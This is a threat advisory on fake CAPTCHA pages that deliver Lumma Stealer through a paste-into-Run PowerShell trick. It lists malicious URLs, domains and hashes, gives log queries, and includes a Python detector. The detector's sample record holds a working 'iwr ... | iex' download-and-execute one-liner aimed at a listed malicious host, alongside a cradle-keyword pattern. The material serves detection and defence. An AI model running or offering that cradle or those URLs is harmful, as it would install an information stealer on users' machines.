FAKE HUMAN CAPTCHA STYLE VERIFICATION PAGES LEAD TO COPY/PASTE SCRIPT FOR LUMMA STEALER

    Date: 09/02/2024

    Severity: High

    Summary

    As of August 27, 2024, fake human-verification (CAPTCHA-style) pages are being used to deliver Lumma Stealer. The page instructs the victim to copy a PowerShell script to the clipboard and paste it into the Windows Run dialog; that script downloads and executes the Lumma Stealer EXE. The running malware then retrieves and uses zip archives that do not appear malicious on their own, which is why the .zip URLs below are listed as indicators alongside the landing pages. This is the same copy/paste (ClickFix) technique reported in June 2024, detailed here: [Unit42 Timely Threat Intel](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-24-IOCs-for-ClickFix-pushing-Lumma-Stealer.txt).

    Indicators of Compromise (IOC) List

    Urls/Domains

    iplogger.co

    tibedowqmwo.shop

    https://human-verify02.b-cdn.net/captcha-verify-v2.html

    get-verified.b-cdn.net

    myapt67.s3.amazonaws.com

    https://myapt67.s3.amazonaws.com/pgrtmed

    https://verif.dlvideosfre.click/2ndhsoru

    futureddospzmvq.shop

    https://myapt67.s3.amazonaws.com/human-verify-system.html

    https://myapt67.s3.amazonaws.com/pgrt1.zip

    human-verify02.b-cdn.net

    https://myapt67.s3.amazonaws.com/pgrtx

    dlvideosfre.click

    get-verified2.b-cdn.net

    https://get-verified.b-cdn.net/captcha-verify-v5.html

    verif.dlvideosfre.click

    https://myapt67.s3.amazonaws.com/human-captcha-v1.html

    ch3.dlvideosfre.click

    https://myapt67.s3.amazonaws.com/pgrt2.zip

    human-check.b-cdn.net

    https://iplogger.co/zbg73.zip

    https://iplogger.co/zv0l8.zip

    https://verif.dlvideosfre.click/k1.zip

    https://verif.dlvideosfre.click/k2.zip

    Hash

    07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d
    
    539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3
    
    7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Urls/Domains

    The domain indicators are matched against both the domain and url fields; the full-URL indicators are matched against the url field only, since a domain field never carries a scheme or path. Note that myapt67.s3.amazonaws.com and the *.b-cdn.net hosts are tenant names on shared AWS S3 and Bunny CDN infrastructure: match the full hostnames as listed, not amazonaws.com or b-cdn.net, or the query will flag legitimate traffic. iplogger.co is a public link-tracking service that also sees non-malicious use, so hits on the bare domain warrant triage rather than automatic blocking.

    userdomainname like "iplogger.co" or url like "iplogger.co" or userdomainname like "tibedowqmwo.shop" or url like "tibedowqmwo.shop" or userdomainname like "futureddospzmvq.shop" or url like "futureddospzmvq.shop" or userdomainname like "human-verify02.b-cdn.net" or url like "human-verify02.b-cdn.net" or userdomainname like "get-verified.b-cdn.net" or url like "get-verified.b-cdn.net" or userdomainname like "get-verified2.b-cdn.net" or url like "get-verified2.b-cdn.net" or userdomainname like "human-check.b-cdn.net" or url like "human-check.b-cdn.net" or userdomainname like "myapt67.s3.amazonaws.com" or url like "myapt67.s3.amazonaws.com" or userdomainname like "dlvideosfre.click" or url like "dlvideosfre.click" or userdomainname like "verif.dlvideosfre.click" or url like "verif.dlvideosfre.click" or userdomainname like "ch3.dlvideosfre.click" or url like "ch3.dlvideosfre.click" or url like "https://human-verify02.b-cdn.net/captcha-verify-v2.html" or url like "https://get-verified.b-cdn.net/captcha-verify-v5.html" or url like "https://myapt67.s3.amazonaws.com/human-verify-system.html" or url like "https://myapt67.s3.amazonaws.com/human-captcha-v1.html" or url like "https://myapt67.s3.amazonaws.com/pgrtmed" or url like "https://myapt67.s3.amazonaws.com/pgrtx" or url like "https://myapt67.s3.amazonaws.com/pgrt1.zip" or url like "https://myapt67.s3.amazonaws.com/pgrt2.zip" or url like "https://verif.dlvideosfre.click/2ndhsoru" or url like "https://verif.dlvideosfre.click/k1.zip" or url like "https://verif.dlvideosfre.click/k2.zip" or url like "https://iplogger.co/zbg73.zip" or url like "https://iplogger.co/zv0l8.zip"

    Hash

    sha256hash IN ("539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3","07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d","7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78")
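    The infection chain in the Summary (a script host launched from the Run dialog, a download cradle, the listed hosts and zip files) and the TDIR queries above can also be expressed as endpoint- and log-side checks. The following is an added example written for this page, not Gurucul's TDIR logic and not Unit42's tooling: it runs the advisory's domain, URL and SHA256 indicators plus a generic paste-into-Run heuristic over constructed process-creation and proxy records. The field names (Image, ParentImage, CommandLine, url, sha256), the cradle keywords and the sample command line are this example's own assumptions; the actual script pasted by victims is not reproduced on this page.

```python
import re
from urllib.parse import urlparse

# Indicators copied from the advisory's IOC list above.
IOC_DOMAINS = {
    "iplogger.co", "tibedowqmwo.shop", "futureddospzmvq.shop", "dlvideosfre.click",
    "verif.dlvideosfre.click", "ch3.dlvideosfre.click", "myapt67.s3.amazonaws.com",
    "human-verify02.b-cdn.net", "get-verified.b-cdn.net", "get-verified2.b-cdn.net",
    "human-check.b-cdn.net",
}
IOC_URLS = {
    "https://human-verify02.b-cdn.net/captcha-verify-v2.html",
    "https://get-verified.b-cdn.net/captcha-verify-v5.html",
    "https://myapt67.s3.amazonaws.com/human-verify-system.html",
    "https://myapt67.s3.amazonaws.com/human-captcha-v1.html",
    "https://myapt67.s3.amazonaws.com/pgrtmed", "https://myapt67.s3.amazonaws.com/pgrtx",
    "https://myapt67.s3.amazonaws.com/pgrt1.zip", "https://myapt67.s3.amazonaws.com/pgrt2.zip",
    "https://verif.dlvideosfre.click/2ndhsoru", "https://verif.dlvideosfre.click/k1.zip",
    "https://verif.dlvideosfre.click/k2.zip", "https://iplogger.co/zbg73.zip",
    "https://iplogger.co/zv0l8.zip",
}
IOC_SHA256 = {
    "07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d",
    "539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3",
    "7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78",
}

# Heuristics of this example (not a signature from the advisory): script hosts a
# Run-dialog paste typically launches, and the primitives a one-line cradle needs.
INTERPRETER = re.compile(r"(?i)\\(powershell|pwsh|mshta)\.exe$")
CRADLE = re.compile(r"(?i)(invoke-webrequest|\biwr\b|invoke-expression|\biex\b|"
                    r"downloadstring|downloadfile|frombase64string|"
                    r"-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden)")
URL_RE = re.compile(r"(?i)https?://[^\s'\"<>)]+")


def host_is_ioc(host: str) -> bool:
    """True if host equals a listed domain or is a subdomain of one. Only the full
    tenant names are listed, so other *.s3.amazonaws.com buckets and *.b-cdn.net
    tenants do not match."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in IOC_DOMAINS for i in range(len(labels)))


def url_is_ioc(url: str) -> bool:
    """Exact URL match first, then fall back to the host check."""
    if url.rstrip("/") in IOC_URLS:
        return True
    return host_is_ioc(urlparse(url).hostname or "")


def analyze_process_event(ev: dict) -> list[str]:
    """Reasons a process-creation record (Sysmon EID 1 / 4688-style fields
    Image, ParentImage, CommandLine) resembles the paste-into-Run chain."""
    reasons = []
    if not INTERPRETER.search(ev.get("Image", "")):
        return reasons
    # The Run dialog is hosted by explorer.exe, so a pasted script shows up as a
    # script host whose parent is explorer.exe rather than a console or IDE.
    if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("script host spawned by explorer.exe (Run dialog)")
    cmd = ev.get("CommandLine", "")
    if CRADLE.search(cmd):
        reasons.append("download/execute cradle in command line")
    reasons += [f"advisory IOC in command line: {u}" for u in URL_RE.findall(cmd) if url_is_ioc(u)]
    return reasons


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run every record through the checks; a record may carry process fields,
    a proxy 'url', and/or a file 'sha256'. Returns (index, reasons) per hit."""
    hits = []
    for i, ev in enumerate(events):
        reasons = analyze_process_event(ev)
        if "url" in ev and url_is_ioc(ev["url"]):
            reasons.append(f"advisory IOC URL/host: {ev['url']}")
        if ev.get("sha256", "").lower() in IOC_SHA256:
            reasons.append("advisory SHA256 match")
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample records, not captured telemetry. Record 0 mirrors the shape
# of a Run-dialog paste; the actual campaign script is not on this page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://verif.dlvideosfre.click/2ndhsoru | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"url": "https://other-bucket.s3.amazonaws.com/release.zip"},
    {"url": "https://myapt67.s3.amazonaws.com/pgrt1.zip"},
    {"sha256": "07B127B0C351547FA8EC4CAC6CD5FD68DC8916DC4557AB13909CA95D53478A7D"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"record {idx}: " + "; ".join(why))
```

    Running it reports records 0, 3 and 4. The benign build-script launch (PowerShell under an IDE, no cradle, no listed host) and the unrelated S3 bucket are not flagged, which is the practical reason for matching the full hostnames rather than amazonaws.com or b-cdn.net; the SHA256 comparison is case-insensitive because EDR and sandbox exports disagree on hash casing.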

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt 

    https://www.linkedin.com/posts/unit42_lumma-stealer-lummastealer-activity-7234943650328125440-Y4CX/ 

    https://x.com/Unit42_Intel/status/1829178013423992948 


    Tags

    Malware
